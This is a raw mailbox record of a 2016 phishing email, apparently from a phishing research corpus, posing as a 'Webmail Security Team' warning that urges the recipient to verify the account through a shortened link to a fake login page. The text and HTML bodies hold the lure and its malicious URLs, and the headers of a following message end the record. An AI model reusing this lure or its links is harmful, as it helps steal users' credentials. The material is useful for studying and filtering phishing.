From: "WEB SECURITY" <test@fundacionnarvaez.com>
Date: Mon, 07 Mar 2016 05:56:27 +0000
Status: O
X-Status: 
X-Keywords:                  
X-UID: 104

You will not see this in a MIME-aware mail reader.
--===============1005134269==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body


 =

   WebMail
  =

Dear
For your safety, we have temporarily disabled some features of your mail. P=
lease click here to verify your email and regain full access to our service=
s. =


If the link above did not appear, please click on the link below to confirm=
 your email address: http://mail-security.fsn-inc.com/login_.%3fsrc/?email=
=3Djose@monkey.org
  =


 *This update is mandatory to avoid you been shut out of your account.
 =


Sincerely,
Webmail Security Team
  =

=A92016 Webmail, Inc. All Rights Reserved.




--===============1005134269==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<HTML><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><BODY><DIV style=3D"WHITE-SPACE: normal; WORD-SPACIN=
G: 0px; TEXT-TRANSFORM: none; COLOR: rgb(34,34,34); FONT: small arial, sans=
-serif; WIDOWS: 1; LETTER-SPACING: normal; BACKGROUND-COLOR: rgb(255,255,25=
5); TEXT-INDENT: 0px; -webkit-text-stroke-width: 0px" dir=3Dltr><BR class=
=3DApple-interchange-newline>
<TABLE style=3D"FONT-FAMILY: Arial, sans-serif" cellSpacing=3D0 cellPadding=
=3D0 width=3D515 align=3Dcenter border=3D0>
<TBODY>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; MARGIN: 0px" bgColor=3D#5486c0=
 vAlign=3Dtop align=3Dcenter><FONT color=3D#ffffff size=3D7 face=3D"arial, =
sans-serif"><B>WebMail</B></FONT></TD></TR>
<TR>
<TD style=3D"FONT-FAMILY: arial, sans-serif; PADDING-LEFT: 25px; MARGIN: 0p=
x; PADDING-RIGHT: 25px" bgColor=3D#ffffff><FONT color=3D#424242 size=3D4><S=
PAN style=3D"LINE-HEIGHT: 30px"><BR>Dear<BR>For your safety, we have tempor=
arily disabled some features of your mail. Please&nbsp;<A style=3D"COLOR: r=
gb(17,85,204)" href=3D"http://tinyurl.com/z69ubhz" target=3D_blank>click he=
re</A>&nbsp;to verify your email and regain full access to our services.&nb=
sp;<BR></SPAN></FONT><FONT size=3D4><SPAN style=3D"FONT-FAMILY: Arial, Helv=
etica, sans-serif; LINE-HEIGHT: 21px"><BR>If the link above did not appear,=
 please click on the link below to confirm your email address:&nbsp;</SPAN>=
<FONT face=3D"Arial, Helvetica, sans-serif"><SPAN style=3D"LINE-HEIGHT: 21p=
x"><A style=3D"COLOR: rgb(17,85,204)" href=3D"http://tinyurl.com/z69ubhz" t=
arget=3D_blank>http://mail-security.<WBR>fsn-inc.com/login_.%3fsrc/?<WBR>em=
ail=3Djose@monkey.org</A></SPAN></FONT></FONT><BR>
<CENTER>
<P style=3D"PADDING-BOTTOM: 0px !important; PADDING-TOP: 0px !important; PA=
DDING-LEFT: 0px !important; MARGIN: 0px; PADDING-RIGHT: 0px !important"><FO=
NT color=3D#424242 face=3DArial><SPAN style=3D"FONT-SIZE: 12px; LINE-HEIGHT=
: 18px"><BR></SPAN></FONT></P>
<P style=3D"PADDING-BOTTOM: 0px !important; PADDING-TOP: 0px !important; PA=
DDING-LEFT: 0px !important; MARGIN: 0px; PADDING-RIGHT: 0px !important"><FO=
NT color=3D#424242 face=3DArial><SPAN style=3D"FONT-SIZE: 12px; LINE-HEIGHT=
: 18px">*This update is&nbsp;mandatory&nbsp;to avoid you been shut out of y=
our account.</SPAN></FONT></P>
<P style=3D"FONT-SIZE: 18px; FONT-FAMILY: Arial; COLOR: rgb(66,66,66); PADD=
ING-BOTTOM: 0px !important; PADDING-TOP: 0px !important; PADDING-LEFT: 0px =
!important; MARGIN: 0px; LINE-HEIGHT: 30px; PADDING-RIGHT: 0px !important">=
</P></CENTER><BR><FONT color=3D#424242 size=3D4><SPAN style=3D"LINE-HEIGHT:=
 30px">Sincerely,</SPAN></FONT><BR><FONT color=3D#424242 size=3D4 face=3DAr=
ial><SPAN style=3D"LINE-HEIGHT: 30px">Webmail Security Team</SPAN></FONT></=
TD></TR>
<TR>
<TD style=3D"FONT-SIZE: 12px; FONT-FAMILY: Arial; COLOR: rgb(66,66,66); PAD=
DING-LEFT: 25px; MARGIN: 0px; LINE-HEIGHT: 18px; PADDING-RIGHT: 25px" bgCol=
or=3D#ffffff><BR>=A92016 Webmail, Inc. All Rights Reserved.<BR><BR></TD></T=
R></TBODY></TABLE></DIV><BR class=3DApple-interchange-newline></BODY></HTML>
--===============1005134269==--


From jose@monkey.org Mon Mar  7 08:44:40 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71266253520.01.foot88_28b1ccd58f50b
Authentication-Results: auth.b.hostedemail.com; dkim=none
	reason="no signature"; dkim-adsp=none (insecure policy);
	dkim-atps=neutral
X-Spam-Summary: 50,0,0,455e96dbcf6d66df,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:41:72:327:355:379:455:800:871:967:973:978:983:988:989:1000:1001:1189:1197:1208:1260:1263:1308:1309:1313:1314:1345:1381:1390:1431:1432:1433:1434:1437:1516:1517:1545:1573:1575:1594:1685:1699:1730:1744:1747:1777:1792:1801:1803:2107:2194:2196:2198:2199:2200:2201:2393:2525:2527:2528:2568:2610:2632:2636:2682:2685:2737:2741:2859:2890:2891:2892:2894:2895:2896:2903:2914:2916:2917:2922:2923:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3148:3154:3353:3552:3554:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4093:4242:4321:4365:4605:4700:6248:6261:6354:6506:6650:6669:6678:6747:7208:7281:7398:7774:7809:7903:7909:8516:8518:8550:8568:8599:8603:8957:9025:9060:9074:9080:9121:9130:9177:9388:9908:10030:10049:10346:11233:11473:11658:11914:12043:12438:12555:12729:12737:12740:12776:12812:12963:12973:13018:13019:13038:13110
X-HE-Tag: foot88_28b1ccd58f50b
X-Filterd-Recvd-Size: 43894
Received: from approject.com (unknown [50.248.86.253])
	by imf03.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Mon,  7 Mar 2016 08:44:39 +0000 (UTC)
